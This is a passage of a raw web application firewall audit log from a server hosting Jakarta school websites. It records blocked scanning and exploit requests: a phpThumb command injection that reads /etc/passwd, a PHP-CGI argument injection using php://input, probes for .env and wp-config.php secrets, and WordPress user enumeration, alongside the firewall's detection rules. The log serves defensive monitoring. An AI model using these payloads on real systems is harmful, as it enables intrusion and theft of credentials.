Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --746c8452-E-- --746c8452-H-- Message: Access denied with code 403 (phase 2). 
Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424956030475 1707 (- - -) Stopwatch2: 1745424956030475 1707; combined=514, p1=352, p2=129, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --746c8452-Z-- --8ce3c57d-A-- [23/Apr/2025:23:15:56 +0700] aAkSPD1ahuoJLEjKiAU18gAAAI8 103.236.140.4 42514 103.236.140.4 8181 --8ce3c57d-B-- GET /scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --8ce3c57d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ce3c57d-E-- --8ce3c57d-H-- Message: Access denied with code 403 
(phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424956224987 1397 (- - -) Stopwatch2: 1745424956224987 1397; combined=490, p1=347, p2=117, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ce3c57d-Z-- --723ed32e-A-- [23/Apr/2025:23:15:56 +0700] aAkSPBuwXEWV6ydgl52ZvgAAAAU 103.236.140.4 42516 103.236.140.4 8181 --723ed32e-B-- GET /editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --723ed32e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --723ed32e-E-- --723ed32e-H-- Message: 
Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424956445907 1847 (- - -) Stopwatch2: 1745424956445907 1847; combined=623, p1=437, p2=154, p3=0, p4=0, p5=32, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --723ed32e-Z-- --94a9662e-A-- [24/Apr/2025:00:43:55 +0700] aAkm2z1ahuoJLEjKiAVpigAAAIg 103.236.140.4 33752 103.236.140.4 8181 --94a9662e-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 45.148.10.172 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 45.148.10.172 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; ANE-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --94a9662e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --94a9662e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745430235147236 818 (- - -) Stopwatch2: 1745430235147236 818; combined=254, p1=225, p2=0, p3=0, p4=0, p5=29, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94a9662e-Z-- --623b9659-A-- [24/Apr/2025:01:17:48 +0700] aAkuzD1ahuoJLEjKiAV82gAAAJM 103.236.140.4 41936 103.236.140.4 8181 --623b9659-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.210 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.210 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --623b9659-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --623b9659-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745432268638633 884 (- - -) Stopwatch2: 1745432268638633 884; combined=399, p1=343, p2=0, p3=0, p4=0, p5=56, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --623b9659-Z-- --8777f25c-A-- [24/Apr/2025:01:17:48 +0700] aAkuzDI97BrbgvDq16S-uwAAAMg 103.236.140.4 41942 103.236.140.4 8181 --8777f25c-B-- GET /config/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.210 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.210 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --8777f25c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8777f25c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745432268892084 785 (- - -) Stopwatch2: 1745432268892084 785; combined=338, p1=297, p2=0, p3=0, p4=0, p5=40, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8777f25c-Z-- --1696465c-A-- [24/Apr/2025:01:17:51 +0700] aAkuz9Iw_rqnm4P5_aciBQAAAFU 103.236.140.4 41956 103.236.140.4 8181 --1696465c-B-- GET /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.210 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.210 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --1696465c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1696465c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745432271885764 3732 (- - -) Stopwatch2: 1745432271885764 3732; combined=503, p1=347, p2=0, p3=0, p4=0, p5=156, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1696465c-Z-- --f82da129-A-- [24/Apr/2025:01:17:52 +0700] aAku0NIw_rqnm4P5_aciBgAAAEM 103.236.140.4 41958 103.236.140.4 8181 --f82da129-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.210 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.210 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --f82da129-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f82da129-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745432272057016 773 (- - -) Stopwatch2: 1745432272057016 773; combined=350, p1=318, p2=0, p3=0, p4=0, p5=32, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f82da129-Z-- --2b122d6e-A-- [24/Apr/2025:01:17:52 +0700] aAku0BuwXEWV6ydgl539xgAAAAI 103.236.140.4 41960 103.236.140.4 8181 --2b122d6e-B-- GET /settings/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.210 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.210 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --2b122d6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b122d6e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745432272239405 743 (- - -) Stopwatch2: 1745432272239405 743; combined=330, p1=295, p2=0, p3=0, p4=0, p5=35, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b122d6e-Z-- --b0425e56-A-- [24/Apr/2025:03:25:23 +0700] aAlMsz1ahuoJLEjKiAWDaQAAAIU 103.236.140.4 43128 103.236.140.4 8181 --b0425e56-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.197.131.145 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.197.131.145 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --b0425e56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b0425e56-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745439923677118 772 (- - -) Stopwatch2: 1745439923677118 772; combined=354, p1=316, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b0425e56-Z-- --9ccd8002-A-- [24/Apr/2025:03:51:54 +0700] aAlS6t5yz20UX9VrdZP3XgAAAEo 103.236.140.4 49352 103.236.140.4 8181 --9ccd8002-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 --9ccd8002-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ccd8002-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745441514617053 945 (- - -) Stopwatch2: 1745441514617053 945; combined=403, p1=362, p2=0, p3=0, p4=0, p5=41, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ccd8002-Z-- --5ec73f52-A-- [24/Apr/2025:04:59:35 +0700] aAlix8lQo524fhbIj1ylPwAAAAk 103.236.140.4 34842 103.236.140.4 8181 --5ec73f52-B-- GET /wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.217.152 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Accept: */* User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force Cookie: X-Forwarded-For: 164.92.217.152 Accept-Encoding: gzip X-Varnish: 135976087 --5ec73f52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5ec73f52-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745445575330353 892 (- - -) Stopwatch2: 1745445575330353 892; combined=346, p1=309, p2=0, p3=0, p4=0, p5=37, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ec73f52-Z-- --33c39f11-A-- [24/Apr/2025:05:25:47 +0700] aAlo695yz20UX9VrdZMEoAAAAEI 103.236.140.4 41650 103.236.140.4 8181 --33c39f11-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.195.204 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.195.204 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --33c39f11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33c39f11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745447147620494 3270 (- - -) Stopwatch2: 1745447147620494 3270; combined=1423, p1=472, p2=911, p3=0, p4=0, p5=40, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33c39f11-Z-- --0c5ff22e-A-- [24/Apr/2025:05:25:58 +0700] aAlo9t5yz20UX9VrdZMEqgAAAFA 103.236.140.4 41694 103.236.140.4 8181 --0c5ff22e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.195.204 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.195.204 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0c5ff22e-C-- demo.sayHello --0c5ff22e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c5ff22e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745447158132676 7031 (- - -) Stopwatch2: 1745447158132676 7031; combined=5028, p1=658, p2=4002, p3=42, p4=42, p5=198, sr=132, sw=86, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c5ff22e-Z-- --b59f316b-A-- [24/Apr/2025:06:43:50 +0700] aAl7Nt5yz20UX9VrdZMJWQAAAFA 103.236.140.4 59402 103.236.140.4 8181 --b59f316b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 1.1; en-gb; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 Accept-Charset: utf-8 --b59f316b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b59f316b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745451830442811 926 (- - -) Stopwatch2: 1745451830442811 926; combined=383, p1=313, p2=0, p3=0, p4=0, p5=70, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b59f316b-Z-- --1938c309-A-- [24/Apr/2025:06:44:16 +0700] aAl7UGLuk3f9kLjsdTbE3gAAAIs 103.236.140.4 59502 103.236.140.4 8181 --1938c309-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.35 Safari/537.36 Accept-Charset: utf-8 --1938c309-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1938c309-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745451856567226 821 (- - -) Stopwatch2: 1745451856567226 821; combined=353, p1=314, p2=0, p3=0, p4=0, p5=39, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1938c309-Z-- --2e828634-A-- [24/Apr/2025:06:53:22 +0700] aAl9cmLuk3f9kLjsdTbFRgAAAI4 103.236.140.4 33274 103.236.140.4 8181 --2e828634-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 202.104.161.131 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 202.104.161.131 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --2e828634-C-- --2e828634-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e828634-E-- --2e828634-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745452402867613 4501 (- - -) Stopwatch2: 1745452402867613 4501; combined=3060, p1=455, p2=2573, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e828634-Z-- --4de3cc67-A-- [24/Apr/2025:07:48:59 +0700] aAmKe95yz20UX9VrdZMMtAAAAEc 103.236.140.4 46086 103.236.140.4 8181 --4de3cc67-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.16 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.16 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4de3cc67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4de3cc67-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file 